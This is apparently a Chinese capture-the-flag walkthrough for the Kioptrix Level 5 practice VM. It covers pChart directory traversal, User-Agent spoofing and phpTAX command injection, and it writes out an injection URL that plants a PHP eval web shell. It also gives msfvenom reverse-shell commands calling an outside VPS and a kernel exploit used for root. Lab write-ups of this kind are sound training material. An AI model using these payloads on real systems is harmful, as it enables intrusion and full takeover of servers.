> 文章列表 > KIOPTRIX: LEVEL 5通关详解

KIOPTRIX: LEVEL 5通关详解

KIOPTRIX: LEVEL 5通关详解

环境配置

KIOPTRIX: LEVEL 5通关详解

虚拟机网络适配器删了重新上一个就行

信息收集

KIOPTRIX: LEVEL 5通关详解
KIOPTRIX: LEVEL 5通关详解

漏洞发现

两个端口的web页面都没有显著的特征,尝试扫描路径,也没有扫到有价值的信息
8080端口访问被拒绝
在80端口的web页面源码中发现信息
KIOPTRIX: LEVEL 5通关详解
访问
KIOPTRIX: LEVEL 5通关详解
注意到title是pChart
KIOPTRIX: LEVEL 5通关详解
尝试利用
KIOPTRIX: LEVEL 5通关详解
可以知道有目录穿越和xss
我们可以尝试去读取apache的配置文件
KIOPTRIX: LEVEL 5通关详解
KIOPTRIX: LEVEL 5通关详解
这时可以知道只有UA相同才能访问
那么改UA再访问
KIOPTRIX: LEVEL 5通关详解
用UA Switcher来伪造UA
KIOPTRIX: LEVEL 5通关详解
这是一个phpTAX searchsploit搜一手
KIOPTRIX: LEVEL 5通关详解KIOPTRIX: LEVEL 5通关详解
试试反弹个shell
用了nc bash php python等方法反弹均失败
那么试试执行id > 1.txt
可以在1.txt中读到命令执行内容
KIOPTRIX: LEVEL 5通关详解
写个一句话
http://192.168.45.139:8080/phptax/index.php?pfilez=1040d1-pg2.tob;echo "<?php eval(\\$_REQUEST[1]);?>" > shell.php;&pdf=make
然后蚁键连上拿虚拟终端

尝试用msf生成稳点的shell
msfvenom -p php/meterpreter/reverse_tcp lhost=vps地址 lport=9000
将生成的内容写入a.php
KIOPTRIX: LEVEL 5通关详解
KIOPTRIX: LEVEL 5通关详解

chmod +x a.php```
然后msf打开```bash
use exploits/multi/handler
use payload php/meterpreter/reverse_tcp
run

php a.php 提示nosocket
那直接访问a.php呢
也是no socket

尝试使用kali自带的shell,存放在/usr/share/webshell/php/php-reverse-shell.php
KIOPTRIX: LEVEL 5通关详解
再访问a.php
成功拿到稳定的shell

提权

下载LinEnum.sh枚举脆弱性

尝试内核提权
KIOPTRIX: LEVEL 5通关详解
KIOPTRIX: LEVEL 5通关详解
用26368.c
KIOPTRIX: LEVEL 5通关详解